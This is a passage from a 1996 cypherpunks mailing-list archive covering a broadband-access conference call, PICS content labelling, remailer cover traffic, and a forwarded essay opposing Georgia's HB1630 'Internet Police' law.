From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 14:06:56 +0800
To: cypherpunks@toad.com
Subject: More on Internet connections
Message-ID: <01I4E4CDI28M8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu"  6-MAY-1996 01:36:44.84
From: Phil Agre <pagre@weber.ucsd.edu>
Subject: Options for Internet and Broadband Access

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 3 May 1996 10:05:08 EST
From: Tim Leshan <LESHAN@ksgrsch.harvard.edu>
To: IIPLIST@ksgrsch.harvard.edu
Subject: Announcement and Call for Participation

                             Freedom Forum
                                
           Harvard Information Infrastructure Project
                                
                    National Economic Council
                                
                    U.S. Department of Energy
                                
                                
                                
                      "THE FIRST 100 FEET"
                                
            OPTIONS FOR INTERNET AND BROADBAND ACCESS
                                
                                
                       October 29-30, 1996
                        The Freedom Forum
                       Arlington, Virginia
                                
                                
             Announcement and Call for Participation
          
     
     This conference looks at options for Internet and broadband
access from the perspective of home owners, apartment complexes,
and small businesses.  It will evaluate opportunities and
obstacles for "bottom-up" infrastructure development and the
implications for traditional and alternative providers at the
neighborhood, regional, and national levels.  We are seeking
original analysis, position papers, and background material for
use in the conference program, on the project website, and in a
book to be published in early 1997.
     
     The conference challenges business and policymakers to
rethink fundamental issues in telecommunications policy by
recasting the "problem of the last 100 feet" as "opportunities
for the first 100 feet."  This paradigm shift suggests
consumer/property owner investment as an answer to the dilemma of
whether there should be one or two wires into the home.  The
conference will survey alternative options for local connection
to the Internet from the perspective of homeowners with high-end
needs for data communications, apartment owners, small
businesses, and others with an interest in investing in end-user
equipment and real estate.  It will consider prospects for
broadly distributed infrastructure investment and potential roles for
utility companies, special assessment districts, municipalities,
PCS providers, CAPs, IXCs, LMDS operators, and Internet access
providers, as well as telcos and cable companies.  It will 
consider strategies and policies for local interconnection and
interoperability among Internet access providers.
     
     The conference will investigate constraints on and
incentives for user infrastructure investment at federal, state,
and local levels; whether and how trenching, conduit, and right-
of-ways should be unbundled to promote consumer/property owner
investment and competition among heterogeneous providers; and
the need for and feasibility of interconnection at third-party or
publicly maintained neighborhood access points.  It will look at
synergy with other policy goals and economic interests, such as
intelligent transportation systems (ITS) and energy demand
management.  Finally, in assessing user investment as a driver
for two-way broadband, it asks how scenarios for Internet access
will affect broadband scenarios by stimulating demand for
high-bandwidth connectivity.
     
Rationale
     
     The growth of the Internet has been propelled in significant
part by user investments in infrastructure: computers, internal
wiring, and the connection (dial-up line, leased line, microwave
link) to the Internet service provider.  This "bottom-up"
investment minimizes the investment burden facing service
providers, since customers share the cost of the infrastructure
and providers have no obligation to develop the infrastructure
out to all potential users.  Barriers to entry for service
providers are low, and users retain flexibility in choosing among
providers.
     
     The rapidly growing mass of Internet users, applications,
and resources is now shaping demand for underlying
infrastructure, so that plans for new infrastructure are driven
increasingly by data rather than voice and video.  There are
opportunities to attract new customers instead of competing head-
on for old ones.  Unlike voice and video, there are incremental
upgrade paths for data users and demand for upgraded access is
readily stimulated by experience.  Higher bandwidth connections
are desired by a wide spectrum of users, from those who work at
home to recreational users of the World Wide Web.
     
     The value of continuous, rather than dial-up connection to
the Internet, is less widely appreciated because it is a
qualitative improvement. Continuous connectivity (which can be
provided by unswitched technologies) obviates tying up a
telephone line, enables instant delivery of email and other
time-sensitive information, and allows small businesses to
advertise and publish directly to the net. Most importantly, it
can enable real-time energy management with attendant cost
savings that can support major infrastructure investment, which
the advent of residential "wheeling" may induce consumers to make
on their own.  A personal computer or an inexpensive router could
serve as a gateway extending Internet functions to other
computers in the home, manage utility demand, operate security
systems, and control any lights, sound equipment, and other
household appliances.
     
     As telecommunications and electric utilities are
deregulated, investment decisions will devolve into the hands of
consumers, where they can be made with greater knowledge of
particular benefits and tradeoffs.  At the same time, new
technologies, such as wireless and data transmission over power
lines, will increase consumer options. There may be a variety of
options for configuring "the last mile," with different balances
between user-provided and centrally provided facilities.
Homeowners and small businesses may have opportunities to connect
to different suppliers at the curb, on the roof, on the side of
the house, or somewhere in between.
     
     The early government role and subsequent commercial
practices have facilitated interconnection of Internet service
providers, but the limited choices at the local level -- the
"last mile" as well as the "last 100 feet" -- may make
interconnection an issue.  At present, many local Internet access
providers do not interconnect directly and traffic is sometimes
routed to one of  the few national exchange points hundreds of
miles away.  Opportunities for interconnection, along with
policies on access, may determine whether intermediary transport
providers, such as utility companies, emerge to link homeowner
facilities at the curb with high-bandwidth Internet service
providers.
     
     This analysis of "the first hundred feet" recognizes that
need and demand will naturally vary greatly from  home to home
and from neighborhood to neighborhood.  Much depends on whether
there are business or telecommuting needs that can be met by
individual investments in upgraded access.  While this analysis
looks to the Internet, it raises the issue of how the bottom-up
model will affect the traditional model of a centrally provided
universal service.  Given basic technology that is non-
proprietary and virtually commoditized, some argue that Internet
service is becoming the common denominator platform on which all
other services can be carried.  The absence of service
class priority has hampered use of real-time voice and video on
the Internet, but this will soon change with the implementation
of protocols that allow bandwidth reservation and packet-level
service priority (RSVP and IPv6).
     
                              ****
                                
     We encourage submission of position papers as well
independent analysis.  It is expected that papers will be posted
for review and revised promptly after the conference for
non-exclusive publication.  (The book will be part of the Harvard
Information Infrastructure Project series published by MIT
Press.)  To ensure consideration for the program, please submit
abstracts or outlines by June 20, 1996.
     
     Please direct submissions and requests for future mailings
to:
     
     Tim Leshan
     Coordinator, Information Infrastructure Project
     Kennedy School of Government, Harvard University
     79 JFK Street
     Cambridge, MA  02138
     617-496-1389; Fax: 617-495-5776
     leshan@ksgrsch.harvard.edu
     
For additional information and updates see
http://ksgwww.harvard.edu/iip/first.html    
Tim Leshan
IIP Project Coordinator
http://ksgwww.harvard.edu/iip/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 13:19:09 +0800
To: vznuri@netcom.com
Subject: Re: misunderstandings of PICS
Message-ID: <01I4E4S4ZWSE8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri"  6-MAY-1996 15:47:46.22

>but you still don't understand what I stated. the above does not make
>any sense relative to the PICS system. it would be like saying, "we 
>are going to report anyone who doesn't have a SMTP that bans dirty
>email". SMTP does not ban dirty email by definition. PICS does not
>censor material by definition. please read the PICS proposal (sorry the
>URL is not handy, could someone post it?)

	See below; I had read this _before_ posting on the CyberAngels and
PICS.

>PICS *doesn't*involve*the*page*designer*. this is an absolutely 
>key component of its design. it exists indepedent of page creators.
>if page creators are suddenly being pressured to format their 
>pages in some way, then PICS has failed in some of its key design
>goals. there are some *optional* ways that page designers can invoke
>PICS principles as I understand, but they make no sense to me. (it
>would be equivalent to someone rating their own material, something
>I think is going to be far from the main use of ratings in the future)

From:	IN%"frantz@netcom.com" 16-APR-1996 20:19:13.88
>From http://www.w3.org/pub/WWW/PICS/iacwc.htm

>... PICS specifies three ways to distribute labels. The first is to embed
>labels in HTML documents. This method will be helpful for those who wish to
>label content they have created. 
>
>The second method is for a client to ask an http server to send labels along
>with the documents it requests. The server would most likely offer the
>publishers' labels, but a server could also redistribute labels from third
>parties that it cooperates with. [Client sends URL of label service to browser
>which responds with that service's label.  bf]
>
>The third way to distribute labels is through a label bureau that dispenses
>only labels. A bureau could distribute labels created by one or more labeling
>services. A client asks the bureau for certain services' labels of specific
>resources. This is most likely to be used for third-party labels. 

	In other words, the CyberAngels want to eliminate any pages that
contain material they think minors shouldn't see that aren't self-rated with
a PICS self-rating (the first of the three types) intended to block minors
from seeing it. Yes, this is an abuse of the market oriented variety of PICS;
they obviously don't know and/or don't care. If you want to convince them
otherwise, start cc:ing your messages (and forwarding mine, on this I give you
permission) on PICS and the CyberAngels to angels@wavenet.com.
	Incidentally, their pressure (especially the legal variety - acting as
informants) could also include against an ISP that doesn't do the second for
material the CyberAngels don't like.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 15:03:41 +0800
To: tcmay@got.net
Subject: Re: WWW proxies?
Message-ID: <01I4E52631IS8Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  6-MAY-1996 01:41:12.77

>-- that a model is lacking (I don't mean we don't have some ideas of what's
>important, but that we haven't filled in the details, figured out what
>sorts of correlations an analyst can make by looking at packet sizes,
>sending times, delivery times, etc.)

	Hmm... I wonder if genetic algorithms would be a good way to analyze
traffic. Admittedly, this may be a matter of my having a (potential) hammer
and seeing things to bash with it.

>-- the real world situation with remailers is that message volume is
>probably way too low for comfort (my presentation on remailers at the first
>CP meeting outlined a need for about 10 mixes, each mixing at least 10
>messages of the same size before remailing...and 20 mixes each mixing 30 or
>more messages is much better...we are most likely far, far below this, for
>nearly all remailed messages. Fortunately, most remailed messages are
>either not critical or are being done for novelty, harassment, flaming,
>etc.).

	It should be possible, given a model, to add onto existing remailers
a routine that automatically forwards random messages through a random string
of remailers and back to itself (or into a /dev/null address; I can see
advantages and disadvantages in the resulting loss of information) at a random
frequency whose bounds are dependant upon current traffic levels at that
remailer. This might be supplemented by information based on statistics gotten
from other remailers. I would suggest Raph Levien (sp?)'s remailer list as a
basis for the random string of remailers.

>(PipeNet-type schemes may help, depending on a bunch of details. So would
>"local mixes in cabinets," meaning, Web anonymizers with high bandwidth
>that do their mixing locally. They have to be "trusted," to some extent,
>but would help a lot. There are some gotchas.)

	There is unfortunately a balance between what an operator will be able
to take - in regards to bandwidth - and what is needed for a web anonymizer
or remailer to work. For remailers, this requirement is greatly decreased by
the lack of immediacy needed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 13:16:38 +0800
To: sjb@universe.digex.net
Subject: Re: PICS required by laws
Message-ID: <01I4E5BWF1628Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sjb@universe.digex.net"  "Scott Brickner"  6-MAY-1996 14:23:50.08

>The problem is that it requires the cooperation of both of your ISPs.
>You'll never receive packets to route from either of them unless you
>have some sort of contract in place.  In the scenario I outlined, the
>"common carrier" status of the ISPs is contingent on their following
>the censorship protocol, so their contract will require that you, too,
>follow it.

	How difficult would it be to set up a router protocol to automatically
select any from a series of other routers that announced itself willing (for a
certain amount of ecash, perhaps)? I had thought that this was pretty close to
the case in any event, for small networks anyway - and connections between
small networks can interconnect into one large network.

>Even in the face of a "digital silk road", this isn't likely to
>change.  The cost of operating a router is proportional to the number
>of connections it has.  The vast majority of traffic doesn't have
>stringent enough delay requirements that it'll be willing to pay the
>additional cost of going through a very highly connected router.
>Therefore the hierarchical star configuration is near-optimal for
>normal traffic (and pretty much all of the stuff that they claim they
>want to censor).

	Directly proportional? I'd think there would have to be somewhat of
a fixed cost involved. The question is whether the fixed cost (including the
cost of a router to handle the ever-increasing bandwidth) is dropping faster
than the cost of the number of connections. And your "normal traffic" doesn't
seem to be including Internet Phone, which I can see being a major source of
bandwidth in the future.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 May 1996 16:29:46 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605062359.QAA09585@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 5/5/96 -0700, Sandy wrote:
>Actually, no.  When I used to edit a magazine, I commissioned an
>article about how much "tax" slaves, serfs, etc. paid.  That is,
>how much of what they produced, did they get to keep; how much
>went to their masters.  The surprising, cross-cultural answer my
>researcher/writer found was that they got to keep everthing they
>produced except 5-10%.  That's a lot better, percentage-wise,
>than for modern "tax slaves."

It was fairly common for serfs to have to provide direct manual labor
on their landlord's farm for 1-2 days per week, depending on the lord,
plus of course if there was a war you often got drafted (depending on
how much you were needed as a farm laborer.)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 7 May 1996 13:40:04 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 5 May 1996
Message-ID: <01I4E5FJVT688Y583T@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu"  6-MAY-1996 14:32:36.01

>EU TAKES A CLOSER LOOK AT THE INTERNET
>European Union culture and telecommunications ministers met last week to
>discuss ways of controlling access to the Internet to prevent criminal
>activity and protect children.  "Many member states perceive the need now
>for some discipline, some kind of regulatory framework or code of ethics,"
>says the Italian telecommunications minister.  Some European governments,
>such as Germany and Great Britain, have already adopted Internet-related
>laws and others are considering it.  (Wall Street Journal 3 May 96 B5B)

	We've heard a lot on the German one. What's the Great Britain one look
like?

>CANADIAN SATELLITES TARGETED
>The race into space with direct broadcast satellite TV has created a
>regulatory black hole that the U.S. government is struggling to fill.  A
>plan by Telesat Canada to finance its $1.6-billion satellite program by
>leasing capacity to American broadcasters has prompted the Federal
>Communications Commission to hold special hearings in Washington to
>investigate whether it can regulate the use of Canadian satellites.
>(Toronto Financial Post 4 May 96 p1)

	Of course they're going to try to control it.
	-Allen

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Smokey Robinson (if your name is Smokey Robinson;  otherwise, substitute
>your own name).  ...  To cancel, send a message to: listproc@educom.unc.edu
>with the message: unsubscribe edupage.   (If you have subscription problems,
>send mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Tue, 7 May 1996 19:06:41 +0800
To: cypherpunks@toad.com
Subject: Georgia Internet Police
Message-ID: <9605062120.AA09638@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




X-within-URL: http://www.clark.net/pub/rothman/ga.htm                           


   [IMAGE] 
   
      Needed: a first-rate lawyer who'll fight the Internet Police law in
      court. Click below on the "How We Can Educate" link for more info on
      constructive actions. 
      
      Return to NetWorld! Book | Other Musing on Intellectual Property
      How We Can Educate Pols, Olympic Boosters and Other Georgians | Links of
      Interest
      Contest: Write the Best "Night the Lights Went Out in Georgia" Parody
      
      The Internet Police Law: The Day the Sites Went Out in Georgia?
      
     David H. Rothman | rothman@clark.net
     
     Linking your Web site to anyone else's without permission? Be glad
     you're not in Georgia--or be worried if you are.
     
     Gov. Zell Miller on the morning of April 18 signed into a law a
     piece of imbecility that the Marietta Daily Journal had dubbed the
     Internet Police bill.
     
     House Bill 1630 may prevent Webfolk from linking from their
     homepages against the wishes of the linkees--at least if the other
     guys' names or logos are used.
     
     Is 1630 a belated April Fool's joke? I've heard of Net-dumb pols,
     but Georgia has out-Exoned Exon--and maybe even out-Doled Dole.
     Shari Steele, an attorney with the Electronic Frontier Foundation,
     wrote Gov. Miller before the signing: "The language of the bill
     would make it illegal to create a button on our web site with
     Wired's 'trade name' or 'logo' without first obtaining 'permission
     or authorization' from Wired magazine." Whoops: oh, please,
     Wired--don't sue me. Actually that would be the state's job; you
     see, the law would let Georgia throw your posterior in jail for up
     to a year.
     
     Live out of state? As of this writing it was unclear how much of a
     danger extradition would pose--maybe none, given the lunacy of the
     law. Then again, there are rumors that California and other states
     may replicate Georgia's stupidity.
     
     The morning the Guv signed the bill, I dropped by the State of
     Georgia Home Page. Under "Search Engines and other Web Services" I
     saw a link to Yahoo. I'm glad the Georgia folks can use Yahoo from
     down there, rather than having to start their own. Imagine Yahoo
     needing permission for every link with a trademarked name. And what
     about a page displaying the results of a Lycos search? Now that
     would be fun. Can you imagine the Lycos computer e-mailing every
     site brought up--asking permission--before it listed Web addresses?
     
     I visited Zell Miller's Web area. Without the least irony, a
     headline read: "Governor Miller's Technology Initiatives Thrive."
     The page bragged about computers in classrooms. Just don't let the
     little brats grow up to start Yahoo Kudzu.
     
     According to the EFF, the same law might make it illegal even to
     mention a company's name on the Web without permission. True? Just
     imagine what this could mean to an online newspaper reviewing
     another publication's Web site. Already a software company outside
     Georgia has used existing intellectual property law to bully a
     reviewer. I've said it once, and I'll say it again: The media are
     damned fools if they support intellectual property zealotry of the
     kind we've seen out of Capitol Hill recently. Goodbye, First
     Amendment. These are national issues, alas, not just problems with
     the Georgia drinking water.
     
     If nothing else, I suspect that the good folks at the AT&T
     Business Network--the ones who run LeadStory.com, a collection of
     the day's hottest stories from online newspapers--may have some
     thoughts on the Georgia bill. To add to the fun, when I dropped by
     Cox Newspapers' big Web site for the Atlanta Journal-Constitution, I
     saw a "Surf Less. Know More" ad from LeadStory.com.
     
     At the Atlanta site's Net News I just happened to read a report on
     a trademark infringement suit that BellSouth had filed against the
     an Internet directory called the Real InterNet Pages. Hmmm. Any
     connections here with the new law? And simply because BellSouth's
     print directories use the trademarked phrase "The Real Yellow
     Pages," is the company entitled to www.realpages.com--the smaller
     company's existing Web address? The Real InterNet Pages, after
     all, isn't saying, "www.realyellowpages.com." In any event one would
     hardly confuse the Real InterNet Pages with BellSouth; the pigmy
     tells visitors to its home page: "Not Affiliated, Associated or
     Connected with BellSouth or any BellSouth-related company."
     
     Coincidentally or not, the Internet Police bill was introduced by
     Don Parsons, a Net-innocent employee of BellSouth. According to the
     Conservative Policy Caucus in the Georgia House: "During floor
     debate, Rep. Parsons could not explain the concept of a link on a
     home page. It was clear to many that he had no idea of what the
     Internet was all about. Supposedly, his desire was to prevent
     'misrepresentation' on the Internet. Parsons admitted that he had
     never been on the Internet, except looking over a colleague's
     shoulder at work." One can understand, then, why many Netfolks
     wonder if Parsons' employer has encouraged him to squelch
     competition at a time when the Baby Bells envision a Web full of
     Yellow Pages. Bell South vehemently denies a connection between it
     and the Parsons bill. Whatever the case, however, the legislation
     would help the Parsons' employer.
     
     Oh, I've read Parsons' stated reasons for his law. But in guarding
     against fraud and protecting intellectual property rights, do we
     really want to toss out the First Amendment? Jeff Kuester, a Net-hip
     attorney of intellectual property in Atlanta, says: "We should
     certainly strive for effective protection of intellectual property
     on the Web, but not by destroying this crucial part of the
     information superhighway. These links let people move seamlessly
     from Web site to Web site. They're as crucial to the Web as bridges
     are to our nation's system of concrete-and-asphalt roads. If nothing
     else, we should avoid denying Netizens the free speech guaranteed
     outside cyberspace." While Parsons has denied that his law would
     make unauthorized links illegal, its wording would suggest
     otherwise.
     
     Criticizing Parsons' work, the Conservative Policy Caucus quotes
     the essence of HB1630 as it could affect links, and I'll pass on a
     rough extract with some tweaks of my own for the sake of clarity and
     precision: "It shall be unlawful for any person...knowingly to
     transmit any data through a computer network...if such data uses any
     individual name, trade name, registered trademark, logo, legal or
     official seal or copyrighted symbol to falsely state or imply that
     such person...has permission or is legally authorized to use such
     trade name, registered trademark..."
     
     Granted, some might say that you could assume implied consent if
     any material is up on an open medium like the Web and you want to
     link to it with appropriate identification by name. But the law is
     still a big threat, given the new legal liabilities it creates for
     journalists, publishers, activists and many others. Suppose your
     story online won't read like a puff piece. Will you need your
     target's goodwill before you can link to the site of a polluter or
     other recipient of negative publicity? And what about linking
     privately? Suppose you're on a local area network in the newsroom
     and want to share information with colleagues by way of an internal
     Web page. Will you require at least your target's tacit consent
     before you can do so? Exactly what does HB1630 mean by "a computer
     network," just the external variety? Not in my extract above was
     this additional language: "for the purpose of setting up,
     maintaining, operating, or exchanging data with an electronic
     mailbox, home page, or any other electronic information storage bank
     or point of access to electronic information." Sounds as if the
     Internet Police law won't delight the Society for Professional
     Journalists, Investigative Reporters and Editors or the Reporter's
     Committee for Freedom of the Press.
     
     Bill 1630 also contains other goodies, according to the valuable
     April 17 issue of EFFector Online and the EFF's Steele. For example,
     Ms. Steele says the bill could criminalize the use of pseudonyms;
     I'd suspect that's of interest to, say, American Online or to
     safety-minded parents who want their children to log on with fake
     names. Besides, just what's a "false" name? Ms. Steele writes of
     someone with the user name of "elvis" and says: "Even my own user
     ID, which is ssteele, does not clearly distinguish me from others
     with the last name of Steele and the first initial 'S.'"
     
     I myself am another good example of the identity issues that
     arise on a global computer network. My publisher insisted on calling
     my book NetWorld!, and it was logical for me to set up a NetWorld!
     Web site but guess what? If you do an Alta Vista search, you'll also
     find thousands of "NetWorld" mentions from unrelated "NetWorld"
     sites and the rest of the Web. Among the others are Peter's Networld
     from Peter Heneback, a Swedish foreign exchange student at West
     Anchorage High School in Alaska; NETWorld Market Place; NetWorld
     Publishing; NetWorld Systems; Networld +Interop, which, yes, has
     been known to hold expos down in Atlanta; and NetWorld Limited, a
     Hong Kong consulting company.
     
     And I'm to worry about other "NetWorlds" and "Networlds" from
     Alaska to Atlanta and Asia?
     
     While trademark law has its place, we need to allow for reasonable
     interpretations. I asked Prima Publishing to consult an attorney
     before it used NetWorld! on pulped wood. No problem, I heard. But
     what happens to my book's online version if I'm in Georgia and
     trademark fanatics prevail in court?
     
     There and elsewhere, politicians keep babbling that they'll get
     government off our backs. What bilge. If Georgia politicans respect
     citizens' rights, why is the high-tech community talking of a
     lawsuit against the Internet Police law? Alas, the Georgia state
     legislature won't meet again until next year, but meanwhile Zell
     Miller might speak out against his baby before it frightens away
     millions of dollars of high-tech business. Perhaps he can at least
     promise to ask his attorney general not to enforce the Internet
     Police law. As long as the law is still alive, I myself will do
     everything I can to warn Netfolks that Georgia is a risky place for
     them to do business right now.
     
     Meanwhile, I suspect that the Internet Police law will be like Jim
     Exon's Communications Decency Act. Many people will just ignore it,
     furthering breaking down the respect of Generation Net for
     politicians and bureaucrats in general.
     
      Return to Top of Page [IMAGE]
      
HOW TO PROTEST THE SILLINESS

     
       _______________________________________________________________
     
     
     
     The Internet Police bill--effective July 1, 1996--passed at least
     partly because politicians kowtowed to Big Bucks. Tell them they
     were wrong, that the bill will cost Georgia, that it's about as
     good for the state as Sherman's March was, that you'll tell your
     high-tech employer to stay the hell out of Georgia to avoid
     net.stupid regulations, that you'll think twice about attending the
     Olympics or buying goods that carry the Olympic logo.
     
     Let Georgia pols know that most Web sites thrive because of the
     ease of linking, not in spite of it. Time Magazine has zillions of
     links all over the Net. And without bureaucratic intervention,
     Netfolks already enjoy a wealth of phone- and Net-directories such
     as Yahoo's.
     
     Tell the Georgians that the Internet Police bill is a creature of
     special interests such as phone companies and, yes, politicians
     trying to crimp uppity rivals, including those in the Conservative
     Caucus. Some establishmentarians hated the idea of the
     conservatives' using the official Georgia seal on their Web site.
     This issue transcends ideology--my own politics are progressive.
     
     Protesting, you should avoid obscenity. Be angry in a rational and
     responsible way. Don't justify the anti-Net stereotypes that
     technophobes love.
     
     Georgia contacts
     
     [IMAGE] Gov. Zell Miller. I'd include an email address for Gov.
     Miller, but I couldn't find one--maybe I'm looking in the wrong
     locations on the Web, or perhaps in the wrong universe. His office
     phone number is 404-656-1776. Fax: 404-656-5948. Snail: Governor
     Zell Miller, State Capitol, Atlanta, Georgia 30334. It's just as
     well, actually, that you not use electronic mail since I doubt
     that the governor's office is that Net Aware. Otherwise why the Exon
     would he have signed this turkey?
     
     [IMAGE] Conservative Policy Caucus of the Georgia House of
     Representatives. You can email Georgia Representative Mitchell Kaye,
     the Webmaster, at webmaster@gahouse.com. Click here for Kaye's
     report on Parsons and the anti-Net law. Arm the Caucus with letters
     it can use to fight this atrocity. What the Net needs now, says
     Representative Kaye, is a court injunction against enforcement of
     the law. Anyone know a first-rate lawyer willing to work pro bono
     and make a name for himself or herself? If so, e-mail or phone
     Mitchell Kaye (770-998-2399), the legislator who so far has spent
     the most time and energy fighting the Internet Police law. Perhaps
     this case could be a natural for a group such as the American Civil
     Liberties Union or the Interactive Services Assocation, whose
     members include American Online, CompuServe and Prodigy, among
     others. One legislator has talked of corrective legislation, but
     according to Kaye's current thinking, a court challenge at this
     point would be more effective, since other politicians could water
     down a bill. At any rate, a bill couldn't be formally introduced
     until January 1996; and, says, Kaye, a court case could be the best
     approach. Stay tuned. Foes of the law are still sorting out their
     options as far as the best way to proceed.
     
     [IMAGE] E-mail addresses of members of the Georgia House, via the
     Conservative Policy Caucus. Remember, some of the people listed may
     be supporters of the Police Bill.
     
     [IMAGE] Names, addresses, home, office, and FAX numbers of state
     legislators. Click here and scroll down the list for contact
     information for Georgia House Speaker Thomas B. Murphy. Do not
     harass him--it'll just backfire. If you can manage, try instead to
     educate him; see if you can't save your anger for posts on the Net.
     
     [IMAGE] Don Parsons' phone number (770-728-8506) and FAX number
     (770-528-5754) and other contact info. Again, please avoid
     harassment! But do give him a piece of your mind; ideally you can
     fax Parsons, then email a cc: to Rep. Mitchell Kaye
     (mkaye@gahouse.com), a vehement critic of the Net Police law. First,
     read Don Parsons' defense of his baby. Among other things he writes
     that "Internet users - consumers, children, business people, clergy,
     etc., - have a right to expect that the Internet pages they visit
     are what they are presented to be." My response? Word on the Net
     circulates pretty quickly about frauds, and existing laws cover many
     situations. New, Internet-specific laws--against fraud or copyright
     violations--need to be much better crafted than HB1630 was. Above
     all, they must be infinitely more respectful of the First Amendment.
     
     
     [IMAGE] Georgia Attorney General Michael Bowers. His phone number is
     404-656-4585; his fax number, 404-657-8733; and his snail address
     is: Judicial Building, Atlanta, Georgia 30334.
     
     [IMAGE] State of Georgia Home Page. Poke around. Look for pressure
     points--people associated with tourism and other business. See
     below.
     
     [IMAGE] Georgia Department of Industry, Trade & Tourism, "Georgia's
     official state agency for developing new jobs and creating capital
     investment." Sign the guest book; register your company's lack of
     interest in relocating there while the Internet Police bill is in
     effect. Use the "Description of Business" field and ask that the
     Webmaster forward your opinion to policymakers.
     
     [IMAGE] Yahoo listings for 1996 Olympic Games. Use the "mailto's"
     (where you click to start writing a letter) and sign the guest books
     with protests against Georgia's medieval information policies.
     
     [IMAGE] 1996 Olympic Games Home Page. Give 'em a piece of your mind
     on the feedback page.
     
     [IMAGE] BellSouth's Olympic links. Yes, BellSouth is an official
     sponsor. So if the Olympic folks take awhile to get the point,
     you'll know why. Of course you might try complaining to BellSouth
     itself--the president is Carl E. Swearington, telephone
     770-391-2424; fax, 770-399-6355.
     
     [IMAGE] Cable News Network (CNN), whose Web site will be directly
     affected by the imbecility out of the state legislature. The
     feedback address is cnn.feedback@cnn.com. Give 'em permission to use
     your name and address on the feedback page. Oh, and while you're at
     it, you might ask CNN to forward your sentiments to Scott Woelfel,
     editor in chief of CNN Interactive. Tell him it's ok to link to
     this page, and suggest that the video part of CNN just might want to
     warn the world about the Internet Police bill.
     
     [IMAGE] E-mail, fax and snail addresses and phone numbers for the
     Georgia media--including the Atlanta papers and the Associated Press
     down there. From the Conservative Caucus.
     
     [IMAGE] Georgia Media List from Harden Political InfoSystems.
     Newspapers, magazines and broadcasters. Looks extremely
     comprehensive.
     
     [IMAGE] Thinking Right, a reader comment area of the Atlanta
     Journal. Speak up! Let Atlanta know that Georgia's on your mind!
     The "Piney Pete Sez" column of April 20 says of the Internet Police
     bill: "What prompted this action was not widespread abuse. It was
     one little gadfly, Rep. Mitchell Kaye, who's been using the great
     seal of Georgia on his conservative Website. Needless to say, Kaye
     is a Republican and consequently shut out of any highway largess,
     concrete or electronic."
     
      Return to Top of Page
      
      [IMAGE]
      
MORE LINKS

     
       _______________________________________________________________
     
     
     
     [IMAGE] Full text of the Internet Police bill.
     
     
     
     [IMAGE] Electronic Frontier Foundation.
     
     [IMAGE] April 17 EFF newsletter with details on the Internet Police
     bill.
     
     [IMAGE] Bell South Denies Lobbying for the Police Law. Rep. Don
     Parsons, sponsor of House Bill 1630, works for BellSouth; but the
     company wrote attorney Jeff Kuester a letter saying Parsons does not
     serve as a lobbyist--and that the actual lobbyists were "totally
     unaware" of the company's suit against the Real InterNet Pages. The
     letter said, "Bell South did not draft, sponsor, promote or lobby
     for 1630. Bell South took no position on the legislation whatsoever
     other than, when it was brought to our attention, to recommend an
     exemption from liability for telephone companies and Internet access
     providers who provide transmission services for their customers."
     BellSouth did say that "it is probably probably overkill and unduly
     complicating to make the act of trademark infringement,
     misrepresentation and passing off on the Internet a crime under
     state law." The company also offered observations on the law's
     effects on links--thoughts with which the Electronic Frontier
     Foundation would undoubtedly disagree.
     
     [IMAGE] The Prize-winning Web Page of Jeff Kuester, the Net-hip
     intellectual property attorney mentioned earlier, who also has an
     engineering background and is active in groups such as IEEE. You can
     bet that like Kuester, scads of other Georgians love the Net and are
     just as surprised and disappointed by the Internet Police law as the
     rest of us were. He has a page with relevant links about the law.
     Kuester (kuester@kuesterlaw.com) is working to bring state pols up
     to speed on Net law and technology, and he would like to expand his
     efforts at the national level. Send him a note if you're interested
     in helping out. A good cause! Note, too, the existence of a
     Congressional Internet Caucus. Education of policymakers is the best
     protection against Net-stupid legislation like HB1630. Perhaps even
     Parsons will see the light someday. Meanwhile, if you want to check
     out some first-class resources on the Net and intellectual property
     law, drop on by Kuester's site!
     
     [IMAGE] The Real InterNet Pages, the Net directory that the
